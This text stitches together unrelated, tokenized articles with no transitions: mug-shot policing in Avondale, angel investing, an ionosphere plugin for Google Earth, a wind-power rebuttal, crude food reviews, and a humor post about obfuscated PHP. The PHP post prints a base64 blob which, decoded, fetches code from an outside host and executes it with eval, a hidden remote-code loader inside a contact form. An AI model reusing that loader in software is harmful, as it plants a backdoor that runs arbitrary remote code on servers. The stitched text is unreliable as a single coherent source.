" The big message here is that we 're directly messing with species by messing with their natural environments , " Sheppard said .
" This is a strong , thumping example where man 's influence can have a profound effect on evolution . "
The team 's work was funded by the UK Department of Environment , Food and Rural Affairs and the Food Standards Agency .
A controversial law - enforcement tactic used to deter crime is now targeting shoplifters , reviving the debate over the civil liberties of people who are singled out for an offense they may or may not have committed .
Avondale is the latest police agency to post suspects ' mug shots online .
The city publicizes photos of adults arrested and accused of shoplifting , even if they have n't been convicted .
Police officials say they 're helping merchants by cracking down on shoplifting , which peaked at 94 reports in October .
But the American Civil Liberties Union and Valley defense attorneys question whether the practice infringes on citizens ' rights .
" I think we have to look at this from a public - policy perspective " and ask if the program is effective , said Alessandra Soler Meetze , executive director of the ACLU of Arizona .
" This is part of a growing trend " to penalize people who are arrested , no matter if they 're cleared later , she said .
El Paso ; Chicago ; and St. Paul , Minn. , already post suspects ' photos online to curb DUI , prostitution , domestic violence or public indecency .
In Arizona , the Maricopa County Attorney 's Office began displaying convicted DUI offenders ' photos in December .
The county Sheriff 's Office posts photos of suspects booked into its jails for about three days .
Avondale is the first in the Valley to zero in on shoplifting through the same tactic .
The city averaged about 74 shoplifting reports per month in 2007 .
From January through March , there were 173 , an average of about 57 per month , according to police figures .
In March , the southwest Valley city launched the online program .
" ( Stores ) keep on losing merchandise .
And with that , they keep on losing profit , " said Sgt. Memo Espinoza , an Avondale police spokesman .
" Our purpose is not to embarrass the individuals . "
Janet Becchina , who manages an Avondale Walgreens near Dysart Road and Van Buren Street , fights store theft daily , sometimes confronting shoplifters without bothering to contact police .
Becchina said she already hangs photos of shoplifters at the store , but posting their pictures online could be extra helpful .
She said viewing the photos could help her employees recognize suspects ' faces if they enter her store .
Psychological impact
Yet legal experts say Avondale 's program runs counter to the presumption of innocence and could taint a jury pool , making it difficult to get a fair trial without changing venue .
" We know from talking to lots of juries that they give lots of weight ( to what police say ) , " Phoenix defense attorney Joey Hamby said .
Even though Avondale 's Web site states " all persons are entitled to the presumption of innocence , " the disclaimer does little to dissuade people from assuming the suspects listed are guilty , Hamby said .
" If they ( police ) thought the guy was innocent . . . his picture would n't be up there , " he said .
Month of notoriety
Avondale began posting photos of adults arrested on suspicion of shoplifting in mid-March .
The Web site - www.avondale.org/police - hosts the photos for about a month .
The suspects named from February arrests range in age from 18 to 61 .
Some have no previous criminal record , while others have an extensive case history .
Donna
Hawk 's picture is among 18 appearing online in connection with February arrests .
Hawk , 40 , of Avondale , admitted she made a mistake , her second shoplifting offense in 14 months .
She said the ordeal of being caught , going to court and paying fines was embarrassing enough .
She said she knew her March conviction for shoplifting from an Avondale Wal - Mart could show up in a background check , but she never thought it would be so easily accessible to anyone browsing Avondale 's Web site .
" If they 're going to single people out , there are worse people than shoplifters , " Hawk said .
Across the nation
Some cities believe publishing suspects ' photos online has been effective , although they acknowledge it is difficult to measure .
Patrick Camden , deputy director of news affairs for Chicago 's police force , described the tactic as one in a series of measures the city uses to fight prostitution , a primary complaint among locals .
" We try to make it ( prostitution ) as difficult as possible to discourage the activity , " Camden said .
El Paso has faced a lawsuit related to posting suspects ' photos .
Javier Sambrano , an El Paso police spokesman , said the city settled the case by clarifying its presumption - of - innocence disclaimer to say the site does not reflect case outcomes .
The St. Paul Police Department began publishing suspects ' photos in partnership with a local newspaper in the early 1980s before moving the program online in the '90s , according to spokesman Tom Walsh .
He said prostitutes have told undercover officers they would not go to St. Paul .
He believes publishing suspects ' photos " has had a deterrent effect , but I can't say that it 's been a blanket success .
" If that were true , " Walsh said , " we would n't have to run undercover operations .
Period . "
You ’re still in your 20s and you ’ve already netted two blockbuster successes .
What do you do next ?
Give others a shot at an Internet fortune .
Jawed Karim , who lucked out as co-founder of YouTube Inc. and an early employee of PayPal Inc. , is taking part in a unique Silicon Valley tradition : helping the next generation of entrepreneurs with cash , counsel and connections .
Despite netting $ 65 million in Google Inc. stock when the search giant bought YouTube , Karim , 28 , lives in a dorm at Stanford University , where he ’s working toward a doctorate in computer science with the goal of becoming a professor .
Advertisement
He also is schooling start - ups through Youniversity Ventures , a twist on the traditional tech investment firm .
Instead of opening their wallets and doors in shiny offices on Sand Hill Road , Silicon Valley ’s famed venture capital strip , Karim and his two partners hold office hours at Stanford every quarter .
They hear start - up pitches from current and former students at the birthplace of such Internet greats as Google and Yahoo Inc .
His collaborators are two successful 38 - year - old entrepreneurs from his PayPal days .
Keith Rabois is vice president of strategy and business development at Slide Inc. , which makes fun features for social networking sites , and Kevin Hartz is chief executive of online event service EventBrite .
With their youthful carriage and casual dress , they could easily pass as students during their campus visits .
But these guys are all business .
On a recent Friday , they listened intently as entrepreneurs presented ideas , interrupting with sharp questions and insightful advice .
Advertisement
They brushed aside boasting and name - dropping -- one team trying to create digital coupons for mobile phones said Jeffrey Ullman , Sergey Brin ’s doctoral advisor , had n’t been this excited about a start - up since Google .
And they wowed young go - getters with war stories .
Rabois recounted that in 2001 , PayPal had resisted buying Google despite the urging of famed venture capitalist Michael Moritz because “ at the time , we had a more proven revenue model . ”
Uplifted by angels
Entrepreneurs - turned - investors are crucial to the ecosystem here , an unparalleled incubator of innovation that so many regions have tried to re-create .
Advertisement
Typically the first to take a chance on start - ups born in dorms or garages , these “ angel ” investors roll up their sleeves well before venture capitalists do .
They write small checks in exchange for minor upfront stakes or convertible notes that can be turned into equity .
Then they coach entrepreneurs through a Darwinian contest in which flameouts far outnumber jackpots .
“ There are smart hackers in Pittsburgh or Ithaca [ N.Y . ] .
There are plenty of rich people in Miami , ” said Paul Graham , 43 , an entrepreneur who runs Y Combinator , which hands out seed money and loads of advice to young entrepreneurs .
“ But what makes Silicon Valley unique is the number of people who became rich from start - ups .
That ’s where all the top angel investors come from . ”
The Youniversity guys scrutinize each start - up for that rare combination of the right team in the right market at the right time .
They decide jointly but invest separately .
And they go with their guts .
Advertisement
That ’s what Rabois did in July 2005 , when he ran into Karim at a barbecue .
They slipped away to their host ’s computer , where Karim showed off his new project , a video - sharing website .
Rabois took one look and blurted : “ Can I invest ? ” That deal netted Rabois $ 4 million in Google stock when the Internet leader bought YouTube for $ 1.65 billion .
Why do these busy executives , who already put in long hours running their own start - ups , sacrifice sleep and time with their families to act as guidance counselors ?
Hartz said it was “ what we do instead of playing golf . ”
It ’s what Karim does when he ’s not in class or hitting the books .
Shunning the spotlight
Advertisement
He dropped out of college in 2000 to join PayPal , which EBay Inc. bought in 2002 for $ 1.54 billion .
After finishing his undergraduate degree at the University of Illinois at Urbana - Champaign , he co-founded YouTube with Chad Hurley and Steven Chen .
Karim remained an advisor when he started grad school , and the Google acquisition landed him nearly $ 65 million in stock .
A soft - spoken engineer who loves to learn , Karim did n’t have much use for the spotlight that comes when your path leads from start - up to stardom .
Yet he is gripped by start - up fever .
About a year ago , he reconnected with Hartz and Rabois .
They hit on a new concept : to exclusively back current and former students at Stanford , where Rabois and Hartz received their undergrad degrees , and Illinois , which has produced such famous computer scientists as Netscape co-founder Marc Andreessen .
“ I want to help students take their idea to the next level and have the mentorship I wish I had had early on , ” Karim said .
Advertisement
Youniversity is providing that mentorship in the midst of the second major Internet gold rush .
With technology making it far easier and cheaper to start a company than ever before , throngs of young wannabe entrepreneurs have swarmed Silicon Valley and its environs .
Some of them make the grade at Y Combinator .
Hundreds apply each semester to get face time with Graham , whose online essays are considered an entrepreneur ’s how - to manual .
He shares advice on how to build a successful company and make connections to top investors .
Since launching in 2005 , Y Combinator has funded 104 companies .
Each gets $ 5,000 , plus $ 5,000 per founder , in return for an equity stake of 2 % to 10 % .
For three straight months in Mountain View , Calif. , or Cambridge , Mass. , entrepreneurs immerse themselves in building their technologies , then pitch their accomplishments to potential investors during a 10 - minute demo .
Six companies have hit the jackpot and been bought .
Many others are on the fast track , generating page views and interest from major Internet players .
Advertisement
Y Combinator ’s spreading influence was on display during its daylong start - up school at Stanford last month .
About 700 people , mostly young guys toting geeky T - shirts and iPhones , came from all over the country , trading Saturday sunshine for fluorescent lights and dreams of becoming the next YouTube .
They camped out in the seats and aisles to hear tech luminaries such as Andreessen and Amazon.com Inc. founder Jeff Bezos .
Andreessen was mobbed after his speech and doled out advice the way he does on his popular blog .
Andreessen says the advice he received from current and former entrepreneurs was essential to his success .
Netscape to Ning
Now worth hundreds of millions of dollars and hard at work on his third start - up , a social networking company called Ning Inc. , Andreessen has returned the favor by investing in roughly 30 companies , including Digg Inc. , Meebo Inc. and Twitter Inc. , over the last four years .
Advertisement
“ I think the value I bring is that I ’ve . . . done what they ’re doing , ” he said .
That ’s what Youniversity does when it holds court in a small conference room in Stanford ’s William Gates Computer Sciences Building , named after the Microsoft Corp. co-founder .
Rabois said they review dozens of business plans in search of young , hungry entrepreneurs with the “ unreasonable amount of tenacity ” and “ raw intellectual horsepower to solve problems others do n’t see or ca n’t solve . ”
So far , Youniversity has offered lots of free advice and held quite a few hands , but it has backed just two companies : online prediction marketplace BluBet Inc. and video chat service TokBox Inc .
Its investments are small by Sand Hill Road standards -- $ 100,000 to $ 300,000 .
The two companies ’ founders say the knowledge and experience they get is more crucial .
Advertisement
“ These guys really work with you to build up the company , ” TokBox co-founder Ron Hose said .
“ They do n’t put their money in and then disappear into the ether . ”
--
jessica.guynn@latimes.com
The ionosphere is the final layer of atmosphere before space .
This highly dynamic region is constantly exposed to the full intensity of the Sun , harsh ultraviolet radiation breaking down molecules and atoms .
Highly charged ions and free electrons therefore fill the ionospheric layers .
Critical to terrestrial communications , the ionosphere also plays host to the largest lightshow on Earth , the Aurora .
Now NASA - funded research has developed a live “ 4D Ionosphere ” plugin for Google Earth .
Now you can fly through the atmosphere ’s uppermost reaches without even leaving your desk …
The ionosphere is highly important to us .
Radio operators will be acutely aware about how the ionosphere influences radio wave propagation .
Ever since Guglielmo Marconi ’s experiments with trans -Atlantic radio communications in 1901 between England and the US , the ionosphere has influenced our ability to communicate over large distances , and without the aid of modern satellite technology .
The ionosphere creates a charged , reflective barrier that radio waves can be bounced off ( bypassing the blocking effect of the curvature of the Earth ) .
However , radio signals are highly influenced by variations in the ionosphere and can be “ blacked out ” should a major solar storm pump charged particles into the magnetosphere and ionosphere .
Even modern Global Positioning Satellite ( GPS ) signals are influenced by this atmospheric layer , reflecting and attenuating radio waves .
As aircraft , ships and other modes of transport now depend on GPS positioning , it is essential that we fully comprehend the physics behind the ionosphere .
In the aim to have a better grasp of the state of the ionosphere , a “ live ” plugin for Google Earth has just been announced .
Funded by NASA ’s Living With a Star ( LWS ) program , it is hoped that this tool can be used by the public and professionals alike to see the current state of the electron content of the ionosphere .
Once downloaded and running , the viewer can rotate the globe and see where electron density is high and where it is low .
In dense regions , it is very hard for radio waves to propagate , signifying that radio quality will be poor , or blocked all together .
In Google Earth , these regions are highlighted in red .
The blue regions show “ normal ” radio propagation regions , expect good quality signal in those locations .
The reason why this new system has been dubbed “ 4D Ionosphere ” is that you can view the ionosphere in three spatial dimensions , and the data is refreshed every ten minutes to give the extra time dimension .
This is n’t the first time Google Earth has been used by organizations for space - based research .
On February 24th , I reported that a plugin had been released to track the space debris currently orbiting our planet .
Nancy also gave the new Google
Sky a test drive in March , a great way to learn about astronomy through this user friendly interface .
I can see lots of applications for this tool already .
Firstly I ’d be very excited to compare the ionosphere during periods of high solar activity with periods when the Sun experiences solar minimum ( like now ) .
This would be especially exciting in Polar Regions in the auroral zone when high quantities of solar wind particles ignite aurorae .
Also , there are possible applications for amateur radio ( ham ) operators who could use this as a means to forecast the strength of the radio signal during campaigns .
I am however uncertain how accurate or how detailed these measurements will be , but it at least gives a very interesting look into the current state of this interesting region of the atmosphere .
Source : NASA
Frankly I ca n’t imagine how hard it must be for this fella to keep his head up with these things .
This is Lurch , the proud bearer of the world ’s largest horns .
Lurch is a Watusi bull living in an Animal shelter , whose horns measure 92.25 cm and weigh more than 100 pounds each .
He ’s quite the attraction in his home state and he ’s favorite pass - time is acting as bodyguard for a crippled horse that ’s being harassed by fellow horses .
He looks amazing does n’t he ?
Source
Andreas C stumbled upon what might possibly be the most secure code ever written .
At least , according to its original author .
Following is the contents of just one of many similarly coded PHP pages ...
<? PHP session_start ( ) ; $ str = ' PD9waHAgc2Vzc2lvbl9zdGFydCgpOyAgDQoNCi8vL01BSUxQRVJNSU4vLy8NCmlmIChpc3NldCgkX1NFU1
NJT05bJ3o4MTJGNzA4QTE4MjYyOTJmUzY1NjlQNzY1QTc1MzE5MzV6NDg1MkU3NDhBNTgzMDI1MiddKSkgew0KICAk
X1NFU1NJT05bJ3g2MTBZNzA2QTE2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddID0gdG
ltZSgpOw0KICAkczMzMzdGNzMzQTQzMjg3NjdVNTE1NUE3NTFBNjEzMDU0OXgzODQySzczOEE0ODI5MjYyID0gDQog
ICAgYWJzKCRfU0VTU0lPTlsneDYxMFk3MDZBMTYyNjA5NGhTNDk1M1c3NDlBNTkzMDM1MVo2NDY4TDc2NEE3NDMxOD
M2J10gDQogICAgICAtICRfU0VTU0lPTlsnejgxMkY3MDhBMTgyNjI5MmZTNjU2OVA3NjVBNzUzMTkzNXo0ODUyRTc0
OEE1ODMwMjUyJ10pOyANCg0KICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1Nj
MwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0K
ICBpZiAoICgkX1NFU1NJT05bJ3MxNzIxVTcxN0EyNzI3MTgzdDI2RDcwMmExMjI2MDE5OHh5NzExVDcwN0ExNzI2MT
kzaiddID49IDIwKSAgDQogICAgICAgJiYgKCRzMzMzN0Y3MzNBNDMyODc2N1U1MTU1QTc1MUE2MTMwNTQ5eDM4NDJL
NzM4QTQ4MjkyNjIgPD0gMzAqIDYwICkpIHsNCiAgICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3
g0NjUwUzc0NkE1NjMwMDU0ID0gMzAgKiA2MCAtICR6MzIzNlQ3MzJBNDIyODY2OHU0MzQ3Wjc0M0E1MzI5NzU3eDQ2
NTBTNzQ2QTU2MzAwNTQ7DQogICAgZWNobyAieW91IGhhdmUgZXhjZWVkZWQgdGhlIG51 bWJlciBvZiB0aW1lcyB5b3
UgYXJlIGFsbG93ZWQgdG8gdXNlIHRoaXMgZm9ybSA8YnI+PGJyPlBsZWFzZSB0cnkgYWdhaW4gaW4gYW4gb25lICgx
KWhvdXIgb3IgdGhyZWUoMyk8YnI+IjsNCiAgICBleGl0Ow0KICB9DQogIGVsc2VpZiAoJHMzMzM3RjczM0E0MzI4Nz
Y3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA+IDMwKiA2MCApIHsNCiAgICBzZXNzaW9uX3Vuc2V0
KCk7IA0KICAgICRfU0VTU0lPTlsnczE3MjFVNzE3QTI3MjcxODN0MjZENzAyYTEyMjYwMTk4eHk3MTFUNzA3QTE3Mj
YxOTNqJ10gPSAwOw0KICB9CQ0
KfSANCmlmIChpc3NldCAoJF9TRVNTSU9OWyd5NzExVDcwN0ExNzI2MTkzalM1NzYx
VDc1N0E2NzMxMTQzWjU2NjBZNzU2QTY2MzEwNDQnXSkpIHsNCiAgJF9TRVNTSU9OWyd4NjEwWTcwNkExNjI2MDk0aF
M0OTUzVzc0OUE1OTMwMzUxWjY0NjhMNzY0QTc0MzE4MzYnXSA9IHRpbWUoKTsNCiAgJHMzMzM3RjczM0E0MzI4NzY3
VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA9IA0KICAgIGFicygkX1NFU1NJT05bJ3g2MTBZNzA2QT
E2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddIA0KICAgICAgLSAkX1NFU1NJT05bJ3k3
MTFUNzA3QTE3MjYxOTNqUzU3NjFUNzU3QTY3MzExNDNaNTY2MFk3NTZBNjYzMTA0NCddKTsNCg0KICAkejMyMzZUNz
MyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUx
NTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0KDQogIGlmICgkejMyMzZUNzMyQTQyMjg2Njh1ND
M0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID4gMikgew0KICAgICRfU0VTU0lPTlsneDIyMjZENzIyQTMy
Mjc2NzhUNjY3ME83NjZBNzYzMjAzNHkzMTM1WTczMUE0MTI4NTY5J10gPSAiIjsNCiAgfQ0
KfQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkvLy9NQUlMUEVSTUlOLy8vDQoNCiRpZF9oZCA9ICc4OEJCLTU4MjInOw0KJGlkX251bSA9ICdmZ2ho
aWprbGtsbW5vcHFyc3R2dnZ3eHd5eUJESkxOUVNVWVphWmRlZmhra21tbnBwcXN2eUFCREVGSUxRVVhYWVhXVE9JeG
tXSnluZldOSUN6dXFsZmFWUExHQXRsZmJWU09MS0lJSkxQVmFmbHJ5SFNkbXhHUGJpckFKVWd1RlEnOw0KPz4NCjw/
cGhwIA0KDQokbXlfdmFyID0gJyc7DQokcGFnZV9kYXRhID0gPDw8IFBBR0VfREFUQQ0KUEFHRV9EQVRBOw0KJFk2Mz
Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSA9IEBmb3BlbiAoImh0dHA6Ly93
d3cuc3BhbWZyZWVjb250YWN0LmNvbS9lcnIvP189NDAyJm9rPSRpZF9udW0iLCAiciIpOw0KaWYgKCEkWTYzNjdLNz
YzQTczMzE3MzdXODU4OUI3ODVBOTUzMzkxNVU5MTk1Tzc5MUExMDEzNDUxKSB7DQogIC8qIGVjaG8gIjxwPlVuYWJs
ZSB0 byBvcGVuIHJlbW90ZSBmaWxlLiI7ICovIA0KICAvKiBleGl0OyAqLw0KfQ0KZWxzZSB7DQoNCiAgd2hpbGUgKC
FmZW9 mKCRZNjM2N0s3NjNBNzMzMTczN1c4NTg5Qjc4NUE5NTMzOTE1VTkxOTVPNzkxQTEwMTM0NTEpKSB7DQogICAg
JFk1NTU5VTc1NUE2NTMwOTQ1dzI5MzNINzI5QTM5MjgzNzF2NDhINzA0QTE0MjYwMzk2dyAuPSBmZ2V0cyAoJFk2Mz
Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSwgMTAyNCk7DQogIH0NCiAgZXZh
bCAoJyA / PicgLiAkWTU1NTlVNzU1QTY1MzA5NDV3MjkzM0g3MjlBMzkyODM3MXY0OEg3MDRBMTQyNjAzOTZ3IC4gJz
w/cGhwICcpOw0KICBmY2xvc2UoJFk2MzY3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAx
MzQ1MSk7DQp9DQoNCmlmICgoJGdvdHRlbiA9PSAxMTEpJiYoJGhkID09ICRpZF9oZCApKSB7DQogIGluY2x1ZGUgKC
dpbml0cm9kZUdsb2JhbF9jb20ucGhwJyk7DQp9IA0KZWxzZWlmICgkZ290dGVuICE9IDExMSkgeyANCiAgaW5 jbHVk
ZSAoJ2luaXRyb2RlR2xvYmFsX2NvbS5waHAnKTsNCn0gDQplbHNlaWYgKCgkZ290dGVuID09IDExMSkmJigkaGQgIT
0gJGlkX2hkICkpIHsNCiAgZWNobyAkZXJyb3JfbXNnOw0KfSANCj8+' ; $ str2 = base64_decode ( $str ) ; /* echo '< pre >'.$ str2 .'</ pre > ' ; */ /* exit( ) ; */ eval ( ' ?' . '>' .$ str2 . ' <' . '? php ') ;?>
Of course , base - 64 encoding was not the original coder ’s only line of defense .
Just in case a clever hacker gained access to the server containing the PHP code files , and figured out how to decode base - 64 , the hacker would likely hit a wall against these impossibly - long variable names in the decoded code ...
///MAILPERMIN/// if ( isset ( $_SESSION [ 'z 812F708A1826292fS6569P765A7531935z4852E748A5830252 ' ] ) ) { $ _SESSION ['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836 ' ] = time ( ) ; $ s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION ['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836 ' ]
- $ _SESSION ['z812F708A1826292fS6569P765A7531935z4852E748A5830252 ' ] ) ; $ z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $ s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60 ; if ( ( $_SESSION [ 's1721U717A2727183t26D702a12260198xy711T707A1726193 j ' ] >= 20 ) && ( $ s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30 * 60 ) ) { $ z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $ z3236T732A4228668u4347Z743A5329757x4650S746A5630054 ; echo " you have exceeded the number of times you are allowed to use this form < br >< br > Please try again in an one ( 1 ) hour or three ( 3 ) < br > " ; exit ; ...
Of course , the full code is certainly worthwhile checking out .
So , hackers , go forth and decode .
As for what this super - secret - sensitive page was used for ... it was a “ Contact Us ” form .
What if your news were delivered in the form of a game ?
For the most part , this would be a good thing .
Anything , from times tables to learning how to play an instrument , is better when played in game format .
The traditional news industry is seeking out new ways to encourage media consumption , and games are becoming central to this particular strategy .
And MSNBC has just released a handful of new games and other applications to do just this .
Designed to be aligned with the rapid nature of online news consumption , one of the games is called NewsBlaster .
It 's where Snood meets Memory .
Match headlines with floating orbs and knock them all off the screen .
MSNBC has even gone so far as to turn the games into Facebook apps so you can compete against friends and get your name on a leaderboard .
Aside from making news into semi-fun , easily played games , there is a good amount of market research and advertising that 's present as buried potential in these games .
In seeing how users interact with news in game format , and how news is shared with others as a result , there is some semblance of attention data that can go into this .
It 's a bit more tricky with MSNBC's NewsBlaster game in particular , but other news game formats that have more involved levels of interaction can get a better grasp on such market research .
I think some would even fit into services like Jacked .
That 's not to say that other apps , one of which is similar to Digg Lab 's screensaver offering , in MSN 's new series can't do this .
I 'm quite interested to see how audiences will respond to news being offered these new ways , especially as they 're integrated with existing social media sites like Facebook .
Additional mobile games and apps would also be appealing under this newly released NewsWare offering .
What do you think ?
This article is a response to one entitled " Australia : where too much wind will never be enough " by Tom Quirk and published in On Line Opinion .
Quirk ’s article is a critique of an article of mine called " The Base - Load Fallacy " and published in www.energyscience.org.au as Briefing Paper No. 16 .
Since most of Quirk ’s points have already been refuted in " The Base - Load Fallacy " and in my book , Greenhouse Solutions with Sustainable Energy ( UNSW Press , 2007 ) , I suggest that interested readers start with my original article .
Here I ’ll offer some clarifications of Quirk ’s misunderstandings .
The underlying issue is whether a mix of renewable energy sources can substitute for a conventional electricity supply system based on fossil fuels .
While Quirk raises the underlying issue , he then evades it and focuses on a sub-issue : namely whether wind power can substitute for coal - fired power stations .
Based on my scientific research experience in this field , I say “ yes ” to both questions , while Quirk says “ no ” to the second question .
Advertisement
Quirk ’s arguments are very similar to those of the anti-wind power organisation , Country Guardian , which appears to have a close relationship with the nuclear industry in the UK .
Quirk , a member of the Institute of Public Affairs , has links to the uranium and other minerals industries through CRA Ltd .
Quirk commences by obfuscating a basic problem of electricity supply : namely that all power stations , whether they are powered by coal , uranium , wind or some other source , are unreliable , to the extent that they fail to generate unexpectedly from time to time .
A coal - fired power station fails infrequently , but then can be out of action for weeks or even months .
A single wind turbine “ fails ” more frequently ( from lulls in the wind ) , but is “ down ” for much shorter periods of time : usually hours or days .
As a consequence , both coal - fired power stations and large quantities of wind power in an electricity grid need partial back - up .
Quirk ’s response to this basic problem is to try to draw a distinction between what he calls “ naturally intermittent ” supply and “ supply which goes off - line unexpectedly ” .
However , wind power for the next hour and the next 24 hours can be predicted quite well , while forced outages of coal - fired power stations cannot .
Quirk ’s argument merely obscures the essential unreliability of all power stations and the fact that an electricity supply system cannot be constructed out of coal - fired power stations alone .
To handle the variations in supply and demand , a mix of different types of power station is needed .
In a conventional system , these types are known as base - load ( 24 - hour power ) , intermediate - load ( generating from dawn to midnight ) and peak - load ( for power variations over a few hours at most ) .
This mix of conventional power stations can also handle the variations introduced by a small amount of wind power in the grid and a large fraction of the variations from a large penetration of wind power into the grid .
Applying Ockham ’s Razor , the simplest scientific description of intermittency is to say that the availability of coal power and wind power are both random variables , that is , they are governed by probability distributions , which can be derived from empirical data .
Further confusion is introduced by Quirk ’s treatment of the capacity factor of a power station , which is its annual average power output divided by its rated power .
Quirk claims , incorrectly , that capacity factor is a measure of performance .
This is obviously untrue for Snowy Hydro and gas turbines , which have typical capacity factors of 5 - 10 per cent , and is also untrue for wind turbines , which have typical capacity factors of up to about 40 per cent .
Incidentally , some coal - fired power stations in New South Wales have capacity factors less than 60 per cent , so they are not much “ better ” than wind farms in this regard .
Advertisement
The different capacity factors of wind and coal power are , of course , taken into account in the calculation of the cost of electricity in cents per kilowatt - hour .
Since Quirk is clearly not confident in the strength of his argument about capacity factors , he then shifts ground to claim that wind and coal should be compared by a so - called “ reliability figure ” .
His “ reliability figure ” is arbitrary , except that it is obviously designed to disadvantage wind .
However , there is an objective way of assessing the reliability of wind versus coal , one which my former CSIRO and ANU colleagues and I used when we constructed generation planning models of electricity supply systems with and without wind power .
This is to calculate the Loss - of - Load - Probability ( LOLP ) or similar indicator of reliability of the whole generation system before and after adding wind power .
Even in the absence of wind power , LOLP cannot be zero , because that would require an infinite amount of back - up and hence an infinite cost .
If LOLP in the presence of wind power is greater than LOLP in the presence of wind power , then some additional peak - load power plant ( gas turbine or hydro ) is added to bring the reliability of the generating system back to its pre-wind power level .
According to our computer modelling , subsequently confirmed and extended by overseas researchers , a 20 per cent wind energy contribution to electricity generation needs a relatively small amount of peak - load back - up , which is operated infrequently , in order to restore the reliability of the supply system to that of the pre-wind system .
( References are given in The Base - Load Fallacy . )
In general , the amount of back - up declines with increasing geographic dispersion of the wind farms .
The South Australian data is a peculiar case , because the four wind farms are approximately lined up perpendicular to one of the prevailing wind directions .
Hence they tend to experience some lulls almost simultaneously .
A much more detailed study by Graham Sinden from Oxford University , published in Energy Policy , vol. 35 , pp.112–127 , draws on 30 years of wind data from 66 sites in the UK and shows that a high degree of reliability results from genuine geographic dispersion .
To conclude , wind power , with a small amount of peak - load back - up , which is operated infrequently , could substitute for several of Australia ’s coal - fired power stations .
Several additional base - load coal - fired power stations could be retired by implementing efficient energy use and solar hot water , while banning electric resistance hot water systems .
A little further down the time track , bioelectricity , generated from combusting the residues of existing crops , and hot rock geothermal power could replace the remaining coal - fired power stations .
The barriers to this transition are not primarily technological or even , with a significant carbon price , economic .
They are the political power of the big greenhouse gas emitting industries .
Join me in saying F - YOU to my tastebuds .
Steve , Do n't Eat It !
Vol. 1
Potted Meat Food Product
There are n't too many products that feel the need to reassure you that they are , in fact , " food . "
Already not a good sign .
The list of ingredients is long and horrifying , coming right out of the gate with " MECHANICALLY SEPARATED CHICKEN . "
Oddly enough , I 'm about to be separated from my lunch , and I have n't even opened the can yet .
Other ingredients include BEEF TRIPE , BEEF HEARTS , AND " PARTIALLY DE - FATTED COOKED PORK FATTY TISSUE " How does one de -fat fat ?
Bizarre .
God knows what else is in here .
Okay , I 'm going to go try it now .
If i'm not back in ten minutes , call Poison Control ...
I 'm back .
Oofah .
Okay , here we go -- Pulling back the lid ( not recommended ) lets loose an odor that punches you in the nose like a stinky fist .
If you 've ever smelled a can of dog food , it 's just like that .
Only imagine you are opening the can while your head is wedged in a horse 's ass .
Inside is a smooth , oddly pink meat paste .
So smooth , in fact , I dare call it " creamy . "
( I actually got a little gaggy just typing that . )
Surprisingly , it was a little spicier than I expected .
Although , that sensation may have been a by - product of my tastebuds dying .
The can shows a serving suggestion of the Potted Meat being served on squares of toast .
I would also suggest squares of toilet paper .
Or maybe a nice diaper .
All I can tell you is , I survived the first installment of " Steve , Don't Eat It . "
And I have to admit it may have even been a little educational .
I know I learned at least one thing from " Ralph's Potted Meat " -- Ralph is a fucking dick .
Not surprisingly , I 've come up with a little slogan the peeps who handle Potted Meat Marketing can use ( no charge , as always ) : POTTED MEAT FOOD PRODUCT : Made By , For , And With Assholes .
Steve , Do n't Eat It !
Vol. 2
Pickled Pork Rinds
While perusing the " Good Lord , NOOOO ! " aisle of the supermarket , I came across the atrocity known as Dolores Brand Pickled Pork Rinds .
These are not the crunchy pork rinds you 'll often see over by the chips .
These are their grosser , soggier , potentially botulism - ier cousins .
The label says " Ready to Eat . "
They left off " By Dumb - Asses . "
There is also a red starburst proudly proclaiming " Nuevo Envase de Vidrio Reusable " .
Not knowing much Spanish , I could only assume that meant " Oh Crap -- A Jar of Skin ! " I was wrong .
It means : " New Reusable Glass Container " which I think is their subtle way of saying you can also use the jar to puke in .
Okay .
I 'm going to go consume .
If I do n't make it back to finish this review , tell my wife I love her .
And not to eat the pork rinds .
****** ****** I 'm back .
First off , I would like to say to Dolores , I am sorry .
I do n't know what it is I did to you , but you have gotten me back and we 're even .
I knew I was in trouble as soon as I opened the jar , and heard no reassuring vacuum seal .
I must admit that made me nervous , but what are the odds of a dusty jar of warm pig skin going bad , right ?
Lifting the lid revealed a weird sour smell , something akin to mild vinegar and stale meat .
I almost want to say it was like a freshly douched pork chop .
But I wo n't .
Why ?
Because I 'm a fucking gentleman .
As I attempted to fish out a " good one , " I could n't help notice the alarming skin texture .
For all those times I wondered what it would be like to gnaw on my grandmother 's thigh , I was about to find out .
Taking a bite , I quickly realized the swatch of fat was n't chewy at all .
In fact , it was eerily soft , not unlike my own swatches of fat .
This was a blessing because less chewing meant less actual contact with my mouth .
